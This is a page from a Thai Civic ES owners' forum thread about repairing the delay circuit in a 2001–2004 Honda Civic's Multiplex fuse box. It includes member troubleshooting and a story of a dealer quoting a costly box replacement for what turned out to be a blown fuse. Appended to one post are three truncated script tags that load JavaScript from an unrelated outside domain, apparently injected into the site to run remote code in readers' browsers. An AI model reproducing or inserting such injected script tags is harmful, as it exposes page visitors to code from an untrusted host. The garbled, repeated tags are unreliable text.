ตอบ
yuncup2008

เข้าร่วม: 05 พฤศจิกา 2008
ตอบ: 427

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 420
ให้คำขอบคุณ: 68

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 24 กรกฎา 2012 19:57 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
M_@nd_M พิมพ์ว่า:

yuncup2008 พิมพ์ว่า:

M_@nd_M พิมพ์ว่า:
เจ้าของกระทู้พอทราบไหมครับ ปัดน้ำฝนเบอร์1ของผมไม่ทำงาน ต้องซ่อมตรงไหนดี

อยากทราบว่านอกจากเสต็ป1ที่เสียแล้ว เสต็ปตัวฉีดน้ำเสียด้วยรึเปล่าครับ ถ้าเสต็ปฉีดน้ำเสียด้วยคงซ่อมยากอ่ะครับ ที่ผมก็มีกล่องMultiplexเสียอาการเดียวกับคุณเลยครับ
แต่ของผมมีไฟเบรคมือขึ้นค้างเพิ่มมาอีกอาการครับ ยังหาทางซ่อมไม่ได้เลย

ฉีดน้ำไม่เสียครับ

งั้นลองเช็คสวิทช์ที่คอพวงมาลัยก่อนจะดีมั้ยครับ 
onitsuka37

ชื่อเล่น: เอ็มอ้วน

เข้าร่วม: 20 พฤษภาคม 2012
ตอบ: 852

Guru ES
Guru ES

ได้รับคำขอบคุณ: 673
ให้คำขอบคุณ: 1007

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 25 กรกฎา 2012 10:23 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
ความรู้ครับผม 
hikaru_kung

เข้าร่วม: 29 ธันวา 2009
ตอบ: 3067

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4341
ให้คำขอบคุณ: 4602
อาทิตย์, 12 สิงหา 2012 10:12 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
เพิ่งเป็นงะ พรายซ่อมได้บ้างก๊าบบบ มะกล้าถอดเองงง กลัวยปทำอยา่งอื่นเสียตามมม เหอะๆ
yuncup2008

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 13 สิงหา 2012 06:06 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
hikaru_kung พิมพ์ว่า:
เพิ่งเป็นงะ พรายซ่อมได้บ้างก๊าบบบ มะกล้าถอดเองงง กลัวยปทำอยา่งอื่นเสียตามมม เหอะๆ

ทำตามขั้นตอนที่ให้ไปครับ ไม่ยากครับ ก็เห็นเพื่อนๆสมาชิคเว็ปเราโทรมาปรึกษา ก็เห็นทำได้ไปหลายท่านแล้วนะครับ
ได้รับคำขอบคุณจาก: hikaru_kung 
bandai_join

เข้าร่วม: 23 กุมภา 2009
ตอบ: 3754

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6410
ให้คำขอบคุณ: 536

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 16 สิงหา 2012 16:19 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
เก็บความรู้ครับ อิอิ 
rakyat

ชื่อเล่น: โก้

เข้าร่วม: 11 กรกฎา 2012
ตอบ: 1262

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 663
ให้คำขอบคุณ: 482

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 18 สิงหา 2012 10:21 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
ขอบคุณมากครับ สุดยอดมาก
es04

เข้าร่วม: 09 มีนา 2009
ตอบ: 803

Guru ES
Guru ES

ได้รับคำขอบคุณ: 3485
ให้คำขอบคุณ: 342

สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 19 สิงหา 2012 00:18 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
ขอยกย่องสมาชิกเก่าแก่ ที่เน้นเนื้อหาจริงๆ ครับ
ได้รับคำขอบคุณจาก: yuncup2008 
yuncup2008

จันทร์, 20 สิงหา 2012 18:56 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
ขอบคุณสำหรับทุกๆความเห็นครับ
ได้รับคำขอบคุณจาก: Aek-4484 
alit

ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 22 สิงหา 2012 15:15 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
สุดยอด ขอบคุณครับ
hikaru_kung

ครอบครัว ES
ครอบครัว ES

พฤหัส, 23 สิงหา 2012 23:01 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
ภอดกล่องมาแล้ววว แต่เปิดฝามะออก เหอะๆ
hikaru_kung

ครอบครัว ES
ครอบครัว ES

พฤหัส, 23 สิงหา 2012 23:20 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
สภาพไหม้หนักเลย มะรู้จะไหวไหม แต่กลิ่นไหม้แรงมากกก

ถอดมาแล้วไหม้ขนาดนี้อะ มะรู้เปลี่ยนฟิวส์จขไหวไหม เหอะๆ ส่วนอาการก่อรแกะคือ แค่ไฟเพดานหน่วงไม่ทำงาน กับรีโมทล็อคเองงง

เง้อออ
ถอดมาแล้วไหม้ขนาดนี้อะ มะรู้เปลี่ยนฟิวส์จขไหวไหม เหอะๆ ส่วนอาการก่อรแกะคือ แค่ไฟเพดานหน่วงไม่ทำงาน กับรีโมทล็อคเองงง

เง้อออ
ได้รับคำขอบคุณจาก: Doraeman 
hikaru_kung

ครอบครัว ES
ครอบครัว ES

ศุกร์, 24 สิงหา 2012 16:31 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
ไปซ่อมมาแล้วคาบบบร้านอมร ที่ดิโอล์สยาม (เค้าซ่อมให้ฟรี เหอะๆ)

เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
yuncup2008

ศุกร์, 24 สิงหา 2012 18:28 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
ดีใจด้วยครับ
viteep

เข้าร่วม: 10 ธันวา 2008
ตอบ: 81

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 116
ให้คำขอบคุณ: 5

สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 25 สิงหา 2012 17:53 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
ICE@WIN พิมพ์ว่า:
ใช้ตัวความต้านทาน0.5แอมป์ใช้ไหมครับ

ฟิวส์ขนาด0.5แอมป์ครับ ไม่ใช่ตัวต้านทานครับ
ตัวต้านทานผมแค่เอามันมาตัดเขาไปต่อกับฟิวส์หลอดให้ได้ตามรูปสุดท้ายอ่ะครับ

รูปฟิวส์หลอดที่ต้องนำมาต่อขาครับ

ร้านอมรจะมีฟิวส์แบบนี้ ที่ต่อขาให้แล้ว เราไม่ต้องทำเองครับ
yuncup2008

อาทิตย์, 26 สิงหา 2012 07:01 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
viteep พิมพ์ว่า:

ICE@WIN พิมพ์ว่า:
ใช้ตัวความต้านทาน0.5แอมป์ใช้ไหมครับ

ฟิวส์ขนาด0.5แอมป์ครับ ไม่ใช่ตัวต้านทานครับ
ตัวต้านทานผมแค่เอามันมาตัดเขาไปต่อกับฟิวส์หลอดให้ได้ตามรูปสุดท้ายอ่ะครับ

รูปฟิวส์หลอดที่ต้องนำมาต่อขาครับ

ร้านอมรจะมีฟิวส์แบบนี้ ที่ต่อขาให้แล้ว เราไม่ต้องทำเองครับ

ใช่ครับ เค้าเรียกว่าฟิวส์หางหนู แต่เท่าที่ผมไปดูมามันจะมีแต่ค่าแอมป์สูงๆทั้งนั้นครับ เลยต้องทำเองครับ
Pantamitr

ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 2 กันยา 2012 17:26 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
ขอบคุณท่าน yuncup2008 มากๆเลยครับ เสียอยู่พอดี กะลังปวดหัวมากๆเลย
มาพบทางสว่างจากท่าน นับเป็นบุญคุณล้นเหลือครับ ขอบคุณมากกกกกก ๆๆๆๆๆ ครับ
Pantamitr

ครอบครัว ES
ครอบครัว ES

สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 2 กันยา 2012 18:13 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
ซวยละ ถอดออกมาเช็คแล้ว (ขอบอกว่า ปลั๊กเยอะมากๆๆ เลย นี่ผมยังไม่รู้จะเสียบกลับได้ครบเหมือนเดิมไหมเนี่ย
ท่านที่ไม่ชำนาญ อย่าเสี่ยงนะครับ กล่องพังเอาได้ง่ายๆ)

ตอนนี้ผมถอดออกมาเช็คแล้ว ปรากฏว่า มันไม่เสียครับ เอาละสิ แล้วทีนี้ มันจะเสียที่ไหนละเนี่ย
Pantamitr

ครอบครัว ES
ครอบครัว ES

จันทร์, 3 กันยา 2012 16:56 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
ขอบอกว่า งานนี้ หินมากๆๆๆ ครับ.
ผมต้องลางาน 1 วัน เพื่อการนี้
เพราะว่า
1.ตอนถอด ผมเกือบทำกล่องเสีย เพราะไอ้เจ้าวงจรชุดที่ติดกับปลั๊ก มันหลุดติดมาด้วย มีแท่งโด่เด่เต็มไปหมด ต้องเสียบกลับคืนให้ได้อย่างเดิมรูเดิม ทุกแท่ง โชคยังดี ที่เสียบกลับได้เหมือนเดิม แต่เล่นเอาเหงื่อตกเลยหละ ตอนที่ฝามันหลุด ท่านอย่าเพิ่งดึงออกมา มิฉะนั้น อาจเป็๋นแบบผม
เื่มื่อฝามันหลุด ท่านต้องกด+ดันตรง ปลั๊ก กรอบสีขาว 2 ปลั๊กนั้นเท่านั้น นะครับ
2.ปลั๊ก มันถอดยากพอสมควร เพราะมันแ่น่นไปหมด พื้นที่ก็จำกัด และตอนเสียบกลับ ขอบอก มันยากมากกกกๆๆๆๆ ท่านต้องกะตำแหน่งของแต่ละปลั๊กให้ดี ไม่งั้น ท่านจะเสียบปลั๊กได้ไม่หมด
3.ปลั๊กแต่ละตัว ไม่ได้มีมาร์คจำเพาะ คือ บางปลั๊ก เสียบด้วยกันได้เฉยเลย ถ้าท่าน ไม่จดที่ตัวปลั๊กไว้ก่อน ว่าถอดมาจากตรงไหน แล้วต้องเสียบกลับปลั๊กไหน มีหวัง เดือนร้อนแน่ๆ กว่าผมจะเสียบได้ถูกปลั๊ก ล่อไปครึ่งวัน เฮ้อ เหนื่อยมาก
4.สรุป ปัญหาไม่ได้เกิดจากตัวนี้ เฮ้อ เหนื่อยฟรี 

ตรวจสอบแล้ว ไม่ใช่ที่ตัวฟิวส์ดังกล่าว มันไม่ได้ขาด และยังอยุ่ในสภาพดี

สงสัยจะเป็นที่ระบบกันขโมยมันรวนแน่ๆเลย เดี๋ยวขอเวลาว่าง จะหาสาเหตุต่อไป

ท่านที่คิดจะทำ ผมขอย้ำว่า งานนี้ หินมากๆๆๆ ครับ

ขอบคุณท่าน เจ้าของกระทู้ครับ ยังไงก็ได้ความรู้เพิ่มดีมากๆครับ
Pantamitr

ครอบครัว ES
ครอบครัว ES

อังคาร, 4 กันยา 2012 07:13 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
ไฟหรี่ไม่ติดอีก เฮ้อ ต้องกลับไปรื้อใหม่อีกที งานเข้าจริงๆ
Pantamitr

ครอบครัว ES
ครอบครัว ES

อังคาร, 4 กันยา 2012 20:46 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
 วันนี้ ร้อนใจ กลัวกล่องจะเสีย เลยเอารถเข้าซ่อมที่ ศูนย์
บริษัท พระราม 3 กรุ๊ป ฮอนด้า ออโตโมบิล จำกัด
358 ถ.นราธิวาสราชนครินทร์ แขวงช่องนนทรี เขตยานนาวา กรุงเทพมหานคร 10120
0-2285-2244

ให้ช่างเช็คว่า เราเสียบปลั๊กเข้ากล่องถูกต้องหมดหรือไม่ ทำไม ไฟหรี่ไม่ทำงาน
ให้ตรวจเช็คการเสียบปลั๊กให้ถูกต้อง

เอาเข้าศูนย์ 11.45 น. ผ่านไป เวลาประมาณ 15.40 น. ช่างโทรมาบอกว่า รถเสร็จแล้ว แต่กล่อง Multiplex เสีย ต้องเปลี่ยนกล่อง ราคา สองหมื่นกว่าบาท 
ผม งง นิดๆ ทำไมแค่เสียบปลั๊กผิด มันถึงกับทำกล่องเจ๊งเลยเหรอ เพราะปกติ วิศวกร จะออกแบบมา ป้องกันความเสียหายที่อาจเกิดขึ้นอยู่
แม้ไม่ 100 เปอร์เซ็นต์ แต่ก็ค่อนข้างรัดกุม ผมจึงรู้สึกทะแม่งๆ แต่ผมไม่เปลี่ยนหรอก ก็จ่ายค่าตรวจเช็คไป 470 บาท

และผมก็เอารถออกมา ผมมารู้ภายหลังว่า นั่นคือ ค่าล้างรถ และค่าโง่ของผม สำหรับการนี้ 

ที่ผิดสังเกตุก็คือ
1. ถ้าเขามีการถอดปลั๊ก ตรวจสอบจริง ทำไม นาฬิกา หน้าปัทม์ รวมถึง สถานีวิทยุ และการ Set ค่าต่างๆในเครื่องเล่น ยังไม่เปลี่ยนแปลง
2. ทำไม ความเสียหาย มันช่างพิกล ถ้ากล่องเสีย ทำไม รถผมยังขับได้ปกติ และไฟที่เสีย ดูเหมือนมันรวมอยู่ที่จุดๆเดียว คือ ไฟหรี่ตามตำแหน่งบอกเกียร์ ตำแหน่งแอร์ ไฟท้าย ไฟหรี่หน้า-หลังซึ่งมันอาจเป็นได้ ที่จะเสียทั้งหมด แต่โอกาศเป็๋นไปได้ยาก

ผมมาถึงบ้านก็ลองมาตรวจสอบการรื้อกล่อง อืม สภาพ ยังเหมือนตอนที่ใส่เข้าไป คืองานมันไม่เรียบร้อย ใส่ไม่เข้าที่
ก็ยังเหมือนเดิม งง ช่างศูนย์ มีฝีมือการประกอบแค่นี้เองเหรอ???

ผมก็เลยเช็ค ฟิวส์ ที่ต้องสงสัย พบว่า ฟิวส์สำหรับไฟหรี่ (ขนาด 15 แอมป์) มันมีอยู่ และผมพบว่า มันขาดครับ
ผมก็แค่ เอาฟิวส์าสำรอง ใส่เข้าไป ทุกอย่างก็ใช้ได้ปกติ

อะโห นี่ถ้าผมรีบร้อน ทำตามช่างแนะนำ ผมมีหวังต้องเสียตังค์เป็นหมื่นไหมเนี่ย
แล้วถ้าช่างเปลี่ยนกล่องแล้ว มันยังใช้ไม่ได้ มาตรวจพบทีหลัง ว่ามันแ่ค่ฟิวส์ขาด เขาจะมีสปิริต บอกเราหรือไม่ ว่า "เอ่อ โทดทีครับพี่
คือที่แจ้งพี่ไปว่า กล่องเสีย อันที่จริงมันแค่ฟิวส์ขาดครับ ตัวละ 10 บาท ตกลงพี่ไม่ต้องเสียค่ากล่องแล้วครับ"  อยากจะรู้ว่า จะมีอย่างนี้ไหม

ถ้าช่างที่ดีๆ ไม่สนใจกับการเสียหน้า ก็คงมีอะนะ แต่ จะมีซักกี่คนครับ

เป็นอุทาหรณ์ สำหรับการเอารถเข้าซ่อม ท่าน ต้องหาปรึกษาคนที่ไว้ใจได้ ให้ดีๆ.ซะด้วยนะครับ บางที มันแค่ เส้นผมบังภูเขา อย่างผม
จากที่ต้องเสียเงินเป็น หมื่น อาจเหลือแค่ 10 บาท นะครับ
ได้รับคำขอบคุณจาก: hikaru_kung  sorn_es02  BEER_CIVIC ES  WarHighways  Doraeman  ake_farlikit 
Pantamitr

ครอบครัว ES
ครอบครัว ES

อังคาร, 4 กันยา 2012 21:11 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
 หรือจะว่าไป เราเอง ไม่รอบคอบเอง ที่เอารถไปให้ช่าง โดยไม่ตรวจสอบให้ดีก่อน<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
yuncup2008

พฤหัส, 6 กันยา 2012 06:51 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
กล่องใหม่ราคา7200ครับ สองหมื่นนี่ค่าอะไรครับ ถ้ายังไม่รับรถบอกช่างไปเลยว่าไม่ซ่อมแล้ว เสียแค่ค่าตราจเช็คก็พอ
จริงๆแล้วผมว่าท่านใจร้อนไปหน่อยนะครับ
1.ตอนถอด ผมเกือบทำกล่องเสีย เพราะไอ้เจ้าวงจรชุดที่ติดกับปลั๊ก มันหลุดติดมาด้วย มีแท่งโด่เด่เต็มไปหมด ต้องเสียบกลับคืนให้ได้อย่างเดิมรูเดิม ทุกแท่ง โชคยังดี ที่เสียบกลับได้เหมือนเดิม แต่เล่นเอาเหงื่อตกเลยหละ ตอนที่ฝามันหลุด ท่านอย่าเพิ่งดึงออกมา มิฉะนั้น อาจเป็๋นแบบผม(เป็นเรื่องปรกติครับแผงบอร์ดมันมี2ชั้นและการใส่กลับก็ใส่ให้มุมมันตรงกันก็ได้แล้วครับ)
3.ปลั๊กแต่ละตัว ไม่ได้มีมาร์คจำเพาะ คือ บางปลั๊ก เสียบด้วยกันได้เฉยเลย ถ้าท่าน ไม่จดที่ตัวปลั๊กไว้ก่อน ว่าถอดมาจากตรงไหน แล้วต้องเสียบกลับปลั๊กไหน มีหวัง เดือนร้อนแน่ๆ กว่าผมจะเสียบได้ถูกปลั๊ก ล่อไปครึ่งวัน เฮ้อ เหนื่อย(ต้องขอโทษจริงๆครับที่ยังให้รายละเอียดไม่ครบ ปลั๊กด้านหน้ากับด้านหลังให้แยกกันออกนะครับเพราะบางช่องมันอาจจะใส่กันลง สงสัยท่านคงเอาปลั๊กมาปนกันแน่เลย)
2. ทำไม ความเสียหาย มันช่างพิกล ถ้ากล่องเสีย ทำไม รถผมยังขับได้ปกติ และไฟที่เสีย ดูเหมือนมันรวมอยู่ที่จุดๆเดียว คือ ไฟหรี่ตามตำแหน่งบอกเกียร์ ตำแหน่งแอร์ ไฟท้าย ไฟหรี่หน้า-หลังซึ่งมันอาจเป็นได้ ที่จะเสียทั้งหมด แต่โอกาศเป็๋นไปได้ยาก(ถ้าอาการเสียอย่างที่บอกมา มันไม่ได้เสียที่กล่องนะครับ เพราะถ้าเสียที่กล่องจริงๆไฟหรี่ยังทำงานแต่มันจะไม่ค่อยๆหรี่ลงเมื่อตอนเราปิดประตู)
ปล.แล้วตกลงว่าตอนแรกๆรถท่านมีอาการเสียยังไง

แก้ไขล่าสุดโดย เมื่อ พฤหัส, 6 กันยา 2012 07:08, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
yuncup2008

พฤหัส, 6 กันยา 2012 06:56 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
เรียนทุกท่านที่เจอปัญหานี้อยู่และต้องการจะซ่อมเอง ให้โทรปรึกษาผมได้นะครับไม่ต้องเกรงใจ (ผมไม่กัดหรอก)
ได้รับคำขอบคุณจาก: WarHighways  Doraeman 
Pantamitr

ครอบครัว ES
ครอบครัว ES

พฤหัส, 6 กันยา 2012 08:08 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
กล่องใหม่ราคา7200ครับ สองหมื่นนี่ค่าอะไรครับ ถ้ายังไม่รับรถบอกช่างไปเลยว่าไม่ซ่อมแล้ว เสียแค่ค่าตราจเช็คก็พอ
จริงๆแล้วผมว่าท่านใจร้อนไปหน่อยนะครับ
1.ตอนถอด ผมเกือบทำกล่องเสีย เพราะไอ้เจ้าวงจรชุดที่ติดกับปลั๊ก มันหลุดติดมาด้วย มีแท่งโด่เด่เต็มไปหมด ต้องเสียบกลับคืนให้ได้อย่างเดิมรูเดิม ทุกแท่ง โชคยังดี ที่เสียบกลับได้เหมือนเดิม แต่เล่นเอาเหงื่อตกเลยหละ ตอนที่ฝามันหลุด ท่านอย่าเพิ่งดึงออกมา มิฉะนั้น อาจเป็๋นแบบผม(เป็นเรื่องปรกติครับแผงบอร์ดมันมี2ชั้นและการใส่กลับก็ใส่ให้มุมมันตรงกันก็ได้แล้วครับ)
3.ปลั๊กแต่ละตัว ไม่ได้มีมาร์คจำเพาะ คือ บางปลั๊ก เสียบด้วยกันได้เฉยเลย ถ้าท่าน ไม่จดที่ตัวปลั๊กไว้ก่อน ว่าถอดมาจากตรงไหน แล้วต้องเสียบกลับปลั๊กไหน มีหวัง เดือนร้อนแน่ๆ กว่าผมจะเสียบได้ถูกปลั๊ก ล่อไปครึ่งวัน เฮ้อ เหนื่อย(ต้องขอโทษจริงๆครับที่ยังให้รายละเอียดไม่ครบ ปลั๊กด้านหน้ากับด้านหลังให้แยกกันออกนะครับเพราะบางช่องมันอาจจะใส่กันลง สงสัยท่านคงเอาปลั๊กมาปนกันแน่เลย)
2. ทำไม ความเสียหาย มันช่างพิกล ถ้ากล่องเสีย ทำไม รถผมยังขับได้ปกติ และไฟที่เสีย ดูเหมือนมันรวมอยู่ที่จุดๆเดียว คือ ไฟหรี่ตามตำแหน่งบอกเกียร์ ตำแหน่งแอร์ ไฟท้าย ไฟหรี่หน้า-หลังซึ่งมันอาจเป็นได้ ที่จะเสียทั้งหมด แต่โอกาศเป็๋นไปได้ยาก(ถ้าอาการเสียอย่างที่บอกมา มันไม่ได้เสียที่กล่องนะครับ เพราะถ้าเสียที่กล่องจริงๆไฟหรี่ยังทำงานแต่มันจะไม่ค่อยๆหรี่ลงเมื่อตอนเราปิดประตู)
ปล.แล้วตกลงว่าตอนแรกๆรถท่านมีอาการเสียยังไง

ขอบคุณสำหรับคำตอบครับ

ในข้อ 2 หลัง ไม่ได้เกิดก่อนที่ผมจะรื้อกล่องครับ ผมรื้อกล่องในตอนแรก ก็เพราะ ไฟเพดาน มันติดๆ ดับๆ ครับ
แต่ ตอนก่อนที่ผมจะเอาเข้าศูนย์ นั่นคือ ปัญหา ในข้อ 2 หลัง
เพราะผมกลัวว่า กล่องอาจจะใกล้พัง กลัวจะเสียไปใหญ่ ก็เลยตัดสินใจ เข้าศูนย์ให้ศูนย์เช็คให้ดีกว่า ก็หวังพึ่งน้ำเย็นละครับ
ดันเจอน้ำร้อนซะนี่
Pantamitr

ครอบครัว ES
ครอบครัว ES

พฤหัส, 6 กันยา 2012 08:12 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
เรียนทุกท่านที่เจอปัญหานี้อยู่และต้องการจะซ่อมเอง ให้โทรปรึกษาผมได้นะครับไม่ต้องเกรงใจ (ผมไม่กัดหรอก)

อืม เรื่องนี้ผมลืมไปจริงๆ คือ ในตอนนั้น ผมรู้สึกกังวลมากไป ก็เลยลืมคิดให้รอบคอบก่อน เกือบเสียตังค์ 2 หมื่นแล้ว
และก็ ที่ท่านว่า กล่องราคา 7000 กว่าบาทนั่น มันกล่องฟิวม์ในห้องเครื่องครับ กล่อง Multiplex ราคา 2หมื่นกว่าบาทครับ ลองเช็คราคาดูใหม่นะครับ 
yuncup2008

พฤหัส, 6 กันยา 2012 10:50 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
เรื่องราคากล่องผมก็ไม่เคยเช็ค(เพราะผมไม่เคยเข้า0เลย) แต่ตามเพื่อนๆที่เคยเปลี่ยนเค้าก็บอกกันว่าราคาเจ็ดพันกว่า อันนี้คงต้องรอท่านอื่นมายืนยันอีกทีนะครับ
ได้รับคำขอบคุณจาก: Pantamitr 
Pantamitr

ครอบครัว ES
ครอบครัว ES

พฤหัส, 6 กันยา 2012 14:54 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
เรื่องราคากล่องผมก็ไม่เคยเช็ค(เพราะผมไม่เคยเข้า0เลย) แต่ตามเพื่อนๆที่เคยเปลี่ยนเค้าก็บอกกันว่าราคาเจ็ดพันกว่า อันนี้คงต้องรอท่านอื่นมายืนยันอีกทีนะครับ

อยากให้เป็นราคานั้นเหมือนกัน

แต่เมื่อวันที่เอารถเข้าศูนย์ เขาเปิดไฟล์อะไหล่ชิ้นส่วนทั้งหมดให้ดูเลยครับ ราคา ก็ตามที่ผมบอกไปแหละครับ
hikaru_kung

ครอบครัว ES
ครอบครัว ES

ศุกร์, 14 กันยา 2012 09:57 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
Pantamitr พิมพ์ว่า:

แต่เมื่อวันที่เอารถเข้าศูนย์ เขาเปิดไฟล์อะไหล่ชิ้นส่วนทั้งหมดให้ดูเลยครับ ราคา ก็ตามที่ผมบอกไปแหละครับ

ราคาน่าจะเป็นมืองสองตามเชียงกงมากกว่าครับ แต่มีพี่ๆในคลับขายกันอยู่ 2500 โดยประมาณครับ ^^
yuncup2008

อาทิตย์, 16 กันยา 2012 08:33 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
ช่วงนี้รู้สึกว่ากระทู้เราจะไปไกลจัง มีท่านนึงจากคลับCR-Vเจ้ากล่องเสียเหมือนกันและเค้าก็ซ่อมได้ แต่ท่านจากคลับFDที่โทรมาเมื่อวาน(สายหลุดซะก่อน)เผื่อว่าท่านได้อ่านกระทู้นี้อีกผมคิดว่าอาการของท่านไม่ได้เสียที่กล่องนะครับ
yuncup2008

อาทิตย์, 16 กันยา 2012 08:37 - เรามาซ่อมวงจรหน่วงเวลาของเจ้ากล่องฟิวส์ Multiplexกันดีกว่า
Pantamitr พิมพ์ว่า:

สองหมื่นกว่าผมว่าน่าจะเป็นกล่องECUรึเปล่าล่ะครับ กล่องMultiplexราคาไม่น่าจะถึงสองหมื่นนะครับ
ตอบ
หน้า 2 จาก 4
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.